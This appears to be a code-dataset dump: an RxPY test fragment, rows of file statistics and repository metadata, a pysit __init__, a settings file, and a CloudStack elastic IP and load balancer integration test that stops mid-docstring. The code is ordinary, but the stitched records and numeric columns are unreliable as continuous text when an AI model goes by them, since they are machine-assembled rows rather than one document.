        res = scheduler.start(create=create).messages
        assert res == [on_error(210, ex)]

    def test_min_by_comparer_throws(self):
        """A throwing comparer surfaces as an error notification."""
        ex = 'ex'
        scheduler = TestScheduler()
        msgs = [
            on_next(150, {
                "key": 1,
                "value": 'z'
            }), on_next(210, {
                "key": 3,
                "value": 'b'
            }), on_next(220, {
                "key": 2,
                "value": 'c'
            }), on_next(230, {
                "key": 4,
                "value": 'a'
            }), on_completed(250)
        ]

        def reverse_comparer(a, b):
            _raise(ex)

        xs = scheduler.create_hot_observable(msgs)

        def create():
            return xs.pipe(ops.min_by(lambda x: x["key"], reverse_comparer))

        res = scheduler.start(create=create).messages
        assert res == [on_error(220, ex)]
| 28.531915
| 78
| 0.478001
| 1,225
| 10,728
| 4.057143
| 0.073469
| 0.042254
| 0.043461
| 0.053521
| 0.878672
| 0.873642
| 0.863783
| 0.863783
| 0.852515
| 0.852515
| 0
| 0.043224
| 0.378915
| 10,728
| 375
| 79
| 28.608
| 0.702686
| 0.00494
| 0
| 0.800654
| 0
| 0
| 0.038134
| 0
| 0
| 0
| 0
| 0
| 0.143791
| 1
| 0.111111
| false
| 0.003268
| 0.009804
| 0.042484
| 0.228758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71e146003a2943e78db3d29b24ca3cfddc536f53
| 173
|
py
|
Python
|
pysit/optimization/__init__.py
|
zfang-slim/pysit
|
8fca42b9749841abc302d1f8195a1437fad7ae4d
|
[
"BSD-3-Clause"
] | 64
|
2015-09-08T06:23:27.000Z
|
2022-03-09T23:35:24.000Z
|
pysit/optimization/__init__.py
|
zfang-slim/pysit
|
8fca42b9749841abc302d1f8195a1437fad7ae4d
|
[
"BSD-3-Clause"
] | 23
|
2015-10-08T01:14:24.000Z
|
2021-07-15T11:37:05.000Z
|
pysit/optimization/__init__.py
|
zfang-slim/pysit
|
8fca42b9749841abc302d1f8195a1437fad7ae4d
|
[
"BSD-3-Clause"
] | 48
|
2015-06-25T14:48:22.000Z
|
2021-12-06T19:50:25.000Z
|
from pysit.optimization.gradient_descent import *
from pysit.optimization.lbfgs import *
from pysit.optimization.cg import *
from pysit.optimization.gauss_newton import *
| 24.714286
| 49
| 0.82659
| 22
| 173
| 6.409091
| 0.454545
| 0.255319
| 0.595745
| 0.574468
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104046
| 173
| 6
| 50
| 28.833333
| 0.909677
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
71e16d0133673cf14f2748901dab066e8ac6ae2e
| 167
|
py
|
Python
|
settings/channel_archiver/NIH.XRAY_SCOPE_settings.py
|
bopopescu/Lauecollect
|
60ae2b05ea8596ba0decf426e37aeaca0bc8b6be
|
[
"MIT"
] | null | null | null |
settings/channel_archiver/NIH.XRAY_SCOPE_settings.py
|
bopopescu/Lauecollect
|
60ae2b05ea8596ba0decf426e37aeaca0bc8b6be
|
[
"MIT"
] | 1
|
2019-10-22T21:28:31.000Z
|
2019-10-22T21:39:12.000Z
|
settings/channel_archiver/NIH.XRAY_SCOPE_settings.py
|
bopopescu/Lauecollect
|
60ae2b05ea8596ba0decf426e37aeaca0bc8b6be
|
[
"MIT"
] | 2
|
2019-06-06T15:06:46.000Z
|
2020-07-20T02:03:22.000Z
|
# Channel-archiver destinations: file paths where logged values of the
# NIH.XRAY_SCOPE process variables are archived.
# NOTE(review): P3 and TRACE_COUNT are assumed to be defined by the loader
# that executes this settings file — confirm against the caller.
P3.filename = '//mx340hs/data/anfinrud_1906/Archive/NIH.XRAY_SCOPE.P3.txt'
TRACE_COUNT.filename = '//mx340hs/data/anfinrud_1906/Archive/NIH.XRAY_SCOPE.TRACE_COUNT.txt'
| 83.5
| 92
| 0.814371
| 26
| 167
| 5
| 0.5
| 0.230769
| 0.292308
| 0.415385
| 0.769231
| 0.769231
| 0.769231
| 0.769231
| 0.769231
| 0
| 0
| 0.098765
| 0.02994
| 167
| 2
| 92
| 83.5
| 0.703704
| 0
| 0
| 0
| 0
| 0
| 0.744048
| 0.744048
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
e0b54317b7693ecfe98ed92da93541ca01d55722
| 52,657
|
py
|
Python
|
test/integration/component/test_eip_elb.py
|
Codegass/cloudstack
|
71056191f2bdad4be1a7eaf9bb73a7dcee3516f2
|
[
"Apache-2.0"
] | 1,131
|
2015-01-08T18:59:06.000Z
|
2022-03-29T11:31:10.000Z
|
test/integration/component/test_eip_elb.py
|
Codegass/cloudstack
|
71056191f2bdad4be1a7eaf9bb73a7dcee3516f2
|
[
"Apache-2.0"
] | 5,908
|
2015-01-13T15:28:37.000Z
|
2022-03-31T20:31:07.000Z
|
test/integration/component/test_eip_elb.py
|
Codegass/cloudstack
|
71056191f2bdad4be1a7eaf9bb73a7dcee3516f2
|
[
"Apache-2.0"
] | 1,083
|
2015-01-05T01:16:52.000Z
|
2022-03-31T12:14:10.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" P1 tests for elastic load balancing and elastic IP
"""
# Import Local Modules
from nose.plugins.attrib import attr
from marvin.cloudstackTestCase import cloudstackTestCase
import unittest
from marvin.cloudstackAPI import (authorizeSecurityGroupIngress,
disassociateIpAddress,
deleteLoadBalancerRule)
from marvin.lib.utils import cleanup_resources
from marvin.lib.base import (Account,
PublicIPAddress,
VirtualMachine,
Network,
LoadBalancerRule,
SecurityGroup,
ServiceOffering,
StaticNATRule,
PublicIpRange)
from marvin.lib.common import (get_zone,
get_domain,
get_template)
from marvin.sshClient import SshClient
import time
class Services:
    """Test elastic load balancing and elastic IP
    """

    def __init__(self):
        # Build each configuration section separately, then assemble the
        # single `services` dict the tests read from.
        account = {
            "email": "test@test.com",
            "firstname": "Test",
            "lastname": "User",
            # Random characters are appended for unique username
            "username": "test",
            "password": "password",
        }
        service_offering = {
            "name": "Tiny Instance",
            "displaytext": "Tiny Instance",
            "cpunumber": 1,
            "cpuspeed": 100,  # in MHz
            "memory": 128,  # In MBs
        }
        lbrule = {
            "name": "SSH",
            # Algorithm used for load balancing
            "alg": "roundrobin",
            "privateport": 22,
            "publicport": 22,
            "openfirewall": False,
        }
        natrule = {
            "privateport": 22,
            "publicport": 22,
            "protocol": "TCP",
        }
        virtual_machine = {
            "displayname": "Test VM",
            "username": "root",
            "password": "password",
            "ssh_port": 22,
            # Hypervisor type should be same as hypervisor type of cluster
            "hypervisor": 'XenServer',
            "privateport": 22,
            "publicport": 22,
            "protocol": 'TCP',
        }
        self.services = {
            "account": account,
            "service_offering": service_offering,
            "lbrule": lbrule,
            "natrule": natrule,
            "virtual_machine": virtual_machine,
            "ostype": 'CentOS 5.3 (64-bit)',  # Cent OS 5.3 (64 bit)
            "sleep": 60,
            "timeout": 10,
        }
class TestEIP(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestEIP, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.services = Services().services
try:
cls.services["netscaler"] = cls.config.__dict__[
"netscalerDevice"].__dict__
except KeyError:
raise unittest.SkipTest("Please make sure you have included netscalerDevice\
dict in your config file (keys - ipaddress, username,\
password")
except Exception as e:
raise unittest.SkipTest(e)
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.services['mode'] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls.account = Account.create(
cls.api_client,
cls.services["account"],
admin=True,
domainid=cls.domain.id
)
# Spawn an instance
cls.virtual_machine = VirtualMachine.create(
cls.api_client,
cls.services["virtual_machine"],
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
networks = Network.list(
cls.api_client,
zoneid=cls.zone.id,
listall=True
)
if isinstance(networks, list):
# Basic zone has only one network i.e Basic network
cls.guest_network = networks[0]
else:
raise Exception(
"List networks returned empty response for zone: %s" %
cls.zone.id)
ip_addrs = PublicIPAddress.list(
cls.api_client,
associatednetworkid=cls.guest_network.id,
isstaticnat=True,
account=cls.account.name,
domainid=cls.account.domainid,
listall=True
)
if isinstance(ip_addrs, list):
cls.source_nat = ip_addrs[0]
print("source_nat ipaddress : ", cls.source_nat.ipaddress)
else:
raise Exception(
"No Source NAT IP found for guest network: %s" %
cls.guest_network.id)
cls._cleanup = [
cls.account,
cls.service_offering,
]
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
return
def tearDown(self):
try:
# Clean up, terminate the created network offerings
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
    @attr(tags=["eip"])
    def test_01_eip_by_deploying_instance(self):
        """Test EIP by deploying an instance.

        Validates that:
        1. The instance gets an IP from the GUEST IP range.
        2. One IP from the EIP pool is taken and configured on the NetScaler
           (verified via "show ip" and "show inat" - output says USIP : ON).
        3. After an ingress rule is added for the port, the guest is
           reachable via the EIP.
        4. In the DB: user_ip_address.is_system=1 and
           user_ip_address.one_to_one_nat=1.
        """
        self.debug("Fetching public network IP range for public network")
        ip_ranges = PublicIpRange.list(
            self.apiclient,
            zoneid=self.zone.id,
            forvirtualnetwork=True
        )
        self.assertEqual(
            isinstance(ip_ranges, list),
            True,
            "Public IP range should return a valid range"
        )
        # Guest network can have multiple IP ranges. In that case, split IP
        # address and then compare the values
        for ip_range in ip_ranges:
            self.debug("IP range: %s - %s" % (
                ip_range.startip,
                ip_range.endip
            ))
            start_ip_list = ip_range.startip.split(".")
            end_ip_list = ip_range.endip.split(".")
            source_nat_list = self.source_nat.ipaddress.split(".")
            # NOTE(review): only the last octet is compared, so this assumes
            # every range shares the source NAT's /24 prefix -- confirm for
            # zones with ranges in different subnets.
            self.assertGreaterEqual(
                int(source_nat_list[3]),
                int(start_ip_list[3]),
                "The NAT should be greater/equal to start IP of guest network"
            )
            self.assertLessEqual(
                int(source_nat_list[3]),
                int(end_ip_list[3]),
                "The NAT should be less/equal to start IP of guest network"
            )
        # Verify listSecurity groups response - the account should have only
        # the default security group at this point.
        security_groups = SecurityGroup.list(
            self.apiclient,
            account=self.account.name,
            domainid=self.account.domainid
        )
        self.assertEqual(
            isinstance(security_groups, list),
            True,
            "Check for list security groups response"
        )
        self.assertEqual(
            len(security_groups),
            1,
            "Check List Security groups response"
        )
        self.debug("List Security groups response: %s" %
                   str(security_groups))
        security_group = security_groups[0]
        # Open port 22 from anywhere so the guest would be reachable via EIP.
        self.debug(
            "Creating Ingress rule to allow SSH on default security group")
        cmd = authorizeSecurityGroupIngress.authorizeSecurityGroupIngressCmd()
        cmd.domainid = self.account.domainid
        cmd.account = self.account.name
        cmd.securitygroupid = security_group.id
        cmd.protocol = 'TCP'
        cmd.startport = 22
        cmd.endport = 22
        cmd.cidrlist = '0.0.0.0/0'
        self.apiclient.authorizeSecurityGroupIngress(cmd)
        # COMMENTED:
        # try:
        #    self.debug("SSH into VM: %s" % self.virtual_machine.ssh_ip)
        #    ssh = self.virtual_machine.get_ssh_client(
        #        ipaddress=self.source_nat.ipaddress)
        # except Exception as e:
        #    self.fail("SSH Access failed for %s: %s" % \
        #              (self.virtual_machine.ipaddress, e)
        #              )
        # Fetch details from user_ip_address table in database
        self.debug(
            "select is_system, one_to_one_nat from user_ip_address\
            where public_ip_address='%s';" %
            self.source_nat.ipaddress)
        qresultset = self.dbclient.execute(
            "select is_system, one_to_one_nat from user_ip_address\
            where public_ip_address='%s';" %
            self.source_nat.ipaddress)
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            1,
            "user_ip_address.is_system value should be 1 for static NAT"
        )
        self.assertEqual(
            qresult[1],
            1,
            "user_ip_address.one_to_one_nat value should be 1 for static NAT"
        )
        # Verify the EIP is actually configured on the NetScaler appliance.
        self.debug("SSH into netscaler: %s" %
                   self.services["netscaler"]["ipaddress"])
        ssh_client = SshClient(
            self.services["netscaler"]["ipaddress"],
            22,
            self.services["netscaler"]["username"],
            self.services["netscaler"]["password"],
        )
        self.debug("command: show ip")
        res = ssh_client.execute("show ip")
        result = str(res)
        self.debug("Output: %s" % result)
        self.assertEqual(
            result.count(self.source_nat.ipaddress),
            1,
            "One IP from EIP pool should be taken and configured on NS"
        )
        self.debug("Command:show inat")
        res = ssh_client.execute("show inat")
        result = str(res)
        self.debug("Output: %s" % result)
        self.assertEqual(
            result.count(
                "NAME: Cloud-Inat-%s" %
                self.source_nat.ipaddress),
            1,
            "User source IP should be enabled for INAT service")
        return
    @attr(tags=["eip"])
    def test_02_acquire_ip_enable_static_nat(self):
        """Test associate new IP and enable static NAT for new IP and the VM.

        Validates that:
        1. For the new IP: user_ip_address.is_system=0 and
           user_ip_address.one_to_one_nat=1.
        2. The default EIP (whose is_system was 1) is released, i.e. its
           is_system flag drops to 0.
        3. The guest is reachable via the new EIP (SSH check is commented
           out below).
        4. Configuration changes are reflected on the NetScaler
           ("show ip" / "show inat" with USIP : ON).
        """
        self.debug("Acquiring new IP for network: %s" % self.guest_network.id)
        public_ip = PublicIPAddress.create(
            self.apiclient,
            accountid=self.account.name,
            zoneid=self.zone.id,
            domainid=self.account.domainid,
            services=self.services["virtual_machine"]
        )
        self.debug("IP address: %s is acquired by network: %s" % (
            public_ip.ipaddress.ipaddress,
            self.guest_network.id))
        self.debug("Enabling static NAT for IP Address: %s" %
                   public_ip.ipaddress.ipaddress)
        StaticNATRule.enable(
            self.apiclient,
            ipaddressid=public_ip.ipaddress.id,
            virtualmachineid=self.virtual_machine.id
        )
        # Fetch details from user_ip_address table in database for the
        # newly acquired IP.
        self.debug(
            "select is_system, one_to_one_nat from user_ip_address\
            where public_ip_address='%s';" %
            public_ip.ipaddress.ipaddress)
        qresultset = self.dbclient.execute(
            "select is_system, one_to_one_nat from user_ip_address\
            where public_ip_address='%s';" %
            public_ip.ipaddress.ipaddress)
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            0,
            "user_ip_address.is_system value should be 0 for new IP"
        )
        self.assertEqual(
            qresult[1],
            1,
            "user_ip_address.one_to_one_nat value should be 1 for static NAT"
        )
        # The original (system-assigned) source NAT should have been
        # released: is_system must have dropped to 0.
        self.debug(
            "select is_system, one_to_one_nat from user_ip_address\
            where public_ip_address='%s';" %
            self.source_nat.ipaddress)
        qresultset = self.dbclient.execute(
            "select is_system, one_to_one_nat from user_ip_address\
            where public_ip_address='%s';" %
            self.source_nat.ipaddress)
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            0,
            "user_ip_address.is_system value should be 0 old source NAT"
        )
        # try:
        #    self.debug("SSH into VM: %s" % public_ip.ipaddress)
        #    ssh = self.virtual_machine.get_ssh_client(
        #        ipaddress=public_ip.ipaddress)
        # except Exception as e:
        #    self.fail("SSH Access failed for %s: %s" % \
        #              (public_ip.ipaddress, e)
        #              )
        # Verify the new EIP configuration on the NetScaler appliance.
        self.debug("SSH into netscaler: %s" %
                   self.services["netscaler"]["ipaddress"])
        try:
            ssh_client = SshClient(
                self.services["netscaler"]["ipaddress"],
                22,
                self.services["netscaler"]["username"],
                self.services["netscaler"]["password"],
            )
            self.debug("command: show ip")
            res = ssh_client.execute("show ip")
            result = str(res)
            self.debug("Output: %s" % result)
            self.assertEqual(
                result.count(public_ip.ipaddress.ipaddress),
                1,
                "One IP from EIP pool should be taken and configured on NS"
            )
            self.debug("Command:show inat")
            res = ssh_client.execute("show inat")
            result = str(res)
            self.debug("Output: %s" % result)
            self.assertEqual(
                result.count(
                    "NAME: Cloud-Inat-%s" %
                    public_ip.ipaddress.ipaddress),
                1,
                "User source IP should be enabled for INAT service")
        except Exception as e:
            self.fail("SSH Access failed for %s: %s" %
                      (self.services["netscaler"]["ipaddress"], e))
        return
    @attr(tags=["eip"])
    def test_03_disable_static_nat(self):
        """Test disable static NAT and release EIP acquired.

        Validates that:
        1. Disabling static NAT releases the user-acquired EIP
           (user_ip_address.is_system=0).
        2. A new IP is automatically assigned from the EIP pool with
           user_ip_address.is_system=1 and user_ip_address.one_to_one_nat=1.
        3. DisassociateIP marks the released EIP (is_system=0) as Free.
        4. Changes are reflected on the NetScaler ("show ip" / "show inat"
           with USIP : ON).
        """
        self.debug(
            "Fetching static NAT for VM: %s" % self.virtual_machine.name)
        ip_addrs = PublicIPAddress.list(
            self.api_client,
            associatednetworkid=self.guest_network.id,
            isstaticnat=True,
            account=self.account.name,
            domainid=self.account.domainid,
            listall=True
        )
        self.assertEqual(
            isinstance(ip_addrs, list),
            True,
            "List Public IP address should return valid IP address for network"
        )
        static_nat = ip_addrs[0]
        self.debug("Static NAT for VM: %s is: %s" % (
            self.virtual_machine.name,
            static_nat.ipaddress
        ))
        # Fetch details from user_ip_address table in database - this is the
        # user-acquired IP from test_02, so is_system must be 0.
        self.debug(
            "select is_system from user_ip_address where\
            public_ip_address='%s';" %
            static_nat.ipaddress)
        qresultset = self.dbclient.execute(
            "select is_system from user_ip_address where\
            public_ip_address='%s';" %
            static_nat.ipaddress)
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            0,
            "user_ip_address.is_system value should be 0"
        )
        self.debug(
            "Disassociate Static NAT: %s" %
            static_nat.ipaddress)
        cmd = disassociateIpAddress.disassociateIpAddressCmd()
        cmd.id = static_nat.id
        self.apiclient.disassociateIpAddress(cmd)
        # Give the backend time to process the disassociation before
        # checking the DB state.
        self.debug("Sleeping - after disassociating static NAT")
        time.sleep(self.services["sleep"])
        # Fetch details from user_ip_address table in database - the
        # released IP must now be Free.
        self.debug(
            "select state from user_ip_address where public_ip_address='%s';"
            % static_nat.ipaddress)
        qresultset = self.dbclient.execute(
            "select state from user_ip_address where public_ip_address='%s';"
            % static_nat.ipaddress
        )
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            "Free",
            "Ip should be marked as Free after disassociate IP"
        )
        # The VM should now have a new, automatically assigned static NAT IP.
        self.debug(
            "Fetching static NAT for VM: %s" % self.virtual_machine.name)
        ip_addrs = PublicIPAddress.list(
            self.api_client,
            associatednetworkid=self.guest_network.id,
            isstaticnat=True,
            account=self.account.name,
            domainid=self.account.domainid,
            listall=True
        )
        self.assertEqual(
            isinstance(ip_addrs, list),
            True,
            "List Public IP address should return valid IP address for network"
        )
        static_nat = ip_addrs[0]
        self.debug("Static NAT for VM: %s is: %s" % (
            self.virtual_machine.name,
            static_nat.ipaddress
        ))
        # Fetch details from user_ip_address table in database for the new IP.
        self.debug(
            "select is_system, one_to_one_nat from user_ip_address\
            where public_ip_address='%s';" %
            static_nat.ipaddress)
        qresultset = self.dbclient.execute(
            "select is_system, one_to_one_nat from user_ip_address\
            where public_ip_address='%s';" %
            static_nat.ipaddress)
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            1,
            "is_system value should be 1 for automatically assigned IP"
        )
        self.assertEqual(
            qresult[1],
            1,
            "one_to_one_nat value should be 1 for automatically assigned IP"
        )
        # try:
        #    self.debug("SSH into VM: %s" % static_nat.ipaddress)
        #    ssh = self.virtual_machine.get_ssh_client(
        #        ipaddress=static_nat.ipaddress)
        # except Exception as e:
        #    self.fail("SSH Access failed for %s: %s" % \
        #              (static_nat.ipaddress, e))
        # Verify the new IP is configured on the NetScaler appliance.
        self.debug("SSH into netscaler: %s" %
                   self.services["netscaler"]["ipaddress"])
        ssh_client = SshClient(
            self.services["netscaler"]["ipaddress"],
            22,
            self.services["netscaler"]["username"],
            self.services["netscaler"]["password"],
        )
        self.debug("command: show ip")
        res = ssh_client.execute("show ip")
        result = str(res)
        self.debug("Output: %s" % result)
        self.assertEqual(
            result.count(static_nat.ipaddress),
            1,
            "One IP from EIP pool should be taken and configured on NS"
        )
        self.debug("Command:show inat")
        res = ssh_client.execute("show inat")
        result = str(res)
        self.debug("Output: %s" % result)
        # NOTE(review): expecting exactly 2 "USIP: ON" entries here -
        # presumably one per INAT rule currently configured; confirm this
        # count against the NS state left by earlier tests.
        self.assertEqual(
            result.count("USIP: ON"),
            2,
            "User source IP should be enabled for INAT service"
        )
        return
    @attr(tags=["eip"])
    def test_04_disable_static_nat_system(self):
        """Test disable static NAT on a system-assigned EIP.

        Validates that:
        1. Trying to disassociate/disable static NAT on an EIP where
           user_ip_address.is_system=1 fails.
        2. The operation raises an exception (asserted below).
        """
        self.debug(
            "Fetching static NAT for VM: %s" % self.virtual_machine.name)
        # NOTE(review): this method uses self.api_client while most other
        # tests in this class use self.apiclient - both come from
        # getApiClient(), but consider unifying for consistency.
        ip_addrs = PublicIPAddress.list(
            self.api_client,
            associatednetworkid=self.guest_network.id,
            isstaticnat=True,
            account=self.account.name,
            domainid=self.account.domainid,
            listall=True
        )
        self.assertEqual(
            isinstance(ip_addrs, list),
            True,
            "List Public IP address should return valid IP address for network"
        )
        static_nat = ip_addrs[0]
        self.debug("Static NAT for VM: %s is: %s" % (
            self.virtual_machine.name,
            static_nat.ipaddress
        ))
        # Fetch details from user_ip_address table in database - after
        # test_03 the VM's static NAT is the system-assigned one (is_system=1).
        self.debug(
            "select is_system from user_ip_address where\
            public_ip_address='%s';" %
            static_nat.ipaddress)
        qresultset = self.dbclient.execute(
            "select is_system from user_ip_address where\
            public_ip_address='%s';" %
            static_nat.ipaddress)
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            1,
            "user_ip_address.is_system value should be 1"
        )
        self.debug(
            "Disassociate Static NAT: %s" %
            static_nat.ipaddress)
        # Disassociating a system IP must be rejected by the API.
        with self.assertRaises(Exception):
            cmd = disassociateIpAddress.disassociateIpAddressCmd()
            cmd.id = static_nat.id
            self.api_client.disassociateIpAddress(cmd)
        self.debug("Disassociate system IP failed")
        return
    @attr(tags=["eip"])
    def test_05_destroy_instance(self):
        """Test EIP after destroying instance.

        Validates that:
        1. Destroying the instance results in is_system=0 for the EIP and
           the EIP is marked as Free.
        2. The IP disappears from the NetScaler configuration
           ("show ip" / "show inat" no longer list it).
        """
        self.debug(
            "Fetching static NAT for VM: %s" % self.virtual_machine.name)
        ip_addrs = PublicIPAddress.list(
            self.api_client,
            associatednetworkid=self.guest_network.id,
            isstaticnat=True,
            account=self.account.name,
            domainid=self.account.domainid,
            listall=True
        )
        self.assertEqual(
            isinstance(ip_addrs, list),
            True,
            "List Public IP address should return valid IP address for network"
        )
        static_nat = ip_addrs[0]
        self.debug("Static NAT for VM: %s is: %s" % (
            self.virtual_machine.name,
            static_nat.ipaddress
        ))
        self.debug("Destroying an instance: %s" % self.virtual_machine.name)
        self.virtual_machine.delete(self.apiclient, expunge=True)
        self.debug("Destroy instance complete!")
        vms = VirtualMachine.list(
            self.apiclient,
            id=self.virtual_machine.id
        )
        self.assertEqual(
            vms,
            None,
            "list VM should not return anything after destroy"
        )
        # Fetch details from user_ip_address table in database - the EIP
        # must be released (is_system=0) and marked Free.
        self.debug(
            "select is_system, state from user_ip_address where\
            public_ip_address='%s';" %
            static_nat.ipaddress)
        qresultset = self.dbclient.execute(
            "select is_system, state from user_ip_address where\
            public_ip_address='%s';" %
            static_nat.ipaddress)
        self.assertEqual(
            isinstance(qresultset, list),
            True,
            "Check DB query result set for valid data"
        )
        self.assertNotEqual(
            len(qresultset),
            0,
            "Check DB Query result set"
        )
        qresult = qresultset[0]
        self.assertEqual(
            qresult[0],
            0,
            "user_ip_address.is_system value should be 0"
        )
        self.assertEqual(
            qresult[1],
            "Free",
            "IP should be marked as Free after destroying VM"
        )
        # Verify the NetScaler no longer carries the released IP.
        self.debug("SSH into netscaler: %s" %
                   self.services["netscaler"]["ipaddress"])
        ssh_client = SshClient(
            self.services["netscaler"]["ipaddress"],
            22,
            self.services["netscaler"]["username"],
            self.services["netscaler"]["password"],
        )
        self.debug("command: show ip")
        res = ssh_client.execute("show ip")
        result = str(res)
        self.debug("Output: %s" % result)
        self.assertEqual(
            result.count(static_nat.ipaddress),
            0,
            "show ip should return nothing after VM destroy"
        )
        self.debug("Command:show inat")
        res = ssh_client.execute("show inat")
        result = str(res)
        self.debug("Output: %s" % result)
        self.assertEqual(
            result.count(static_nat.ipaddress),
            0,
            "show inat should return nothing after VM destroy"
        )
        return
class TestELB(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestELB, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.services['mode'] = cls.zone.networktype
try:
cls.services["netscaler"] = cls.config.__dict__[
"netscalerDevice"].__dict__
except KeyError:
raise unittest.SkipTest("Please make sure you have included netscalerDevice\
dict in your config file (keys - ipaddress, username,\
password")
except Exception as e:
raise unittest.SkipTest(e)
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.services["virtual_machine"]["template"] = cls.template.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls.account = Account.create(
cls.api_client,
cls.services["account"],
admin=True,
domainid=cls.domain.id
)
# Spawn an instance
cls.vm_1 = VirtualMachine.create(
cls.api_client,
cls.services["virtual_machine"],
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
cls.vm_2 = VirtualMachine.create(
cls.api_client,
cls.services["virtual_machine"],
accountid=cls.account.name,
domainid=cls.account.domainid,
serviceofferingid=cls.service_offering.id
)
networks = Network.list(
cls.api_client,
zoneid=cls.zone.id,
listall=True
)
if isinstance(networks, list):
# Basic zone has only one network i.e Basic network
cls.guest_network = networks[0]
else:
raise Exception(
"List networks returned empty response for zone: %s" %
cls.zone.id)
cls.lb_rule = LoadBalancerRule.create(
cls.api_client,
cls.services["lbrule"],
accountid=cls.account.name,
networkid=cls.guest_network.id,
domainid=cls.account.domainid
)
cls.lb_rule.assign(cls.api_client, [cls.vm_1, cls.vm_2])
cls._cleanup = [
cls.account,
cls.service_offering,
]
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
return
def tearDown(self):
try:
# Clean up, terminate the created network offerings
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
    @attr(tags=["eip"])
    def test_01_elb_create(self):
        """Test ELB by creating a LB rule.

        Validates that:
        1. Two instances are deployed (done in setUpClass).
